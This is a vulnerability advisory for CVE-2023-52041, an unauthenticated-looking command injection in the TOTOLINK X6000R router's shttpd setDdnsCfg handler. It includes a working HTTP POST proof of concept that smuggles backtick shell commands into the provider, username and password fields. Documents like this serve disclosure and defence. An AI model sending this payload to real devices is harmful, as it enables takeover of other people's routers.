CVE-2023-52041

Product:

TOTOLINK X6000R

Version：

V9.4.0cu.852_B20230719

Firmware download address ：

https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/247/ids/36.html

Vulnerability Description：

In the sub_410118 function of the shttpd program, it is possible to obtain the passed values using Uci_Set_Str and then achieve arbitrary command execution through CsteSystem.

POC

Execute the commands ls > /1.txt, ls > /2.txt, and ls > /3.txt respectively.

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.75.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Origin: http://192.168.75.2
Connection: close
Referer: http://192.168.75.2/advance/ddns.html
{"enable":"1","provider":"`ls > /1.txt`","domain":"1","username":"`ls > /2.txt`","password":"`ls > /3.txt`","topicurl":"setDdnsCfg"}

effect

Analysis

In sub_410118,The program receives the provider, username, and password passed from the frontend, and then processes them by passing them into Uci_Set_Str.

In Uci_Set_Str, the parameters are concatenated using snprintf and then passed into CsteSystem for execution.

CsteSystem: